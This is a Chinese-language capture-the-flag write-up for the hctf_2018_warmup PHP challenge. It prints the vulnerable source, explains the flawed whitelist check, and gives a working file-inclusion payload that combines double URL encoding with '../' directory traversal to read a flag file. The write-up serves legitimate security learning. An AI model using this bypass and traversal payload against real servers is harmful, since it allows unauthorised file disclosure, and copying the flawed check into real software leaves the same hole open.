BMZCTF hctf_2018_warmup
目录
之前做过一次,这次再细细分析一下
打开题目:
f12,可以看到提示,source.php
访问可以得到源码
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true; //第一个返回true的地方
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true; //第二个返回true的地方
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true; //第三个返回true的地方,也就是我们利用的地方
}
echo "you can't see it";
return false;
}
}
//主函数
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
同时也看到了hint.php,访问,得到
说明flag在根目录下的文件名字是flaaagg,不是flag
代码审计
代码分为两部分,前半部分是checkFile($page)函数,后半部分是主函数。
从主函数顺着分析
(1)在source.php下,我们传入一个参数file,要求非空,是字符串,file参数传入checkFile()函数返回是true,同时满足这三个条件则执行include($file),这就是我们的利用点(文件包含)
(2)分析checkFile()函数,我们可以很容易地发现有三个返回true地地方,我们一条一条来分析:
(3)第一个返回true的地方如下,意思是$page函数在$whitelist也就是白名单中,就返回true
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
但是这个返回true必须要求$page是source.php或者hint.php中的一个,但是这样就无法利用文件包含include()了,所以此处无用,前往下一个返回true的地方。
(4)第二个返回true的地方如下
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
代码意思是我在$page后拼接了'?',然后对新的$page进行截取,截取从第一个字符至第一个'?'出现的前一个字符,不理解的话,看下面我的复现
<?php
$page = "hello world";
$_page = mb_substr($page , 0 ,mb_strpos($page . '?','?'));
echo $_page."\n";
$page1 = "hello wo?rld";
$_page1 = mb_substr($page , 0 ,mb_strpos($page1 . '?','?'));
echo $_page1;
echo "\n";
结果:
hello world
hello wo
这里的话如果传入source.php? ,会在这里返回,但是不能构成文件包含flag的条件
同时,如果我们传入source.php?3f(%3f是字符?的url编码),但是实际传到$page的值还是source.php?
(5)第三个返回true的地方,
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
echo "第三次返回";
return true;
}
echo "you can't see it";
return false;
首先将$_page进行url解码,然后函数截取$_page之前的部分,如果截取的部分刚好是白名单中的,则利用成功。
我们可以利用url二次编码,并且配合目录穿越,进行文件包含
首先如果我们将file的值定为source.php%253f(%253f是%3f的url编码)
经过实践,实际$page的值是source.php%3f,$_page也是source.php%3f,然后解码,变为source.php?,可以返回true,同时后边可以拼接../来进行目录穿越
(本地复现的时候进行的操作,方便分析,下图添加了echo $page)
结果
所以最终的payload
?file=source.php%253F/../../../../flaaagg
或者
?file=hint.php%253F/../../../../flaaagg
小结
还可以参考我之前写的一个wp,有本题中许多函数的解释,但是代码分析本篇还是更好一点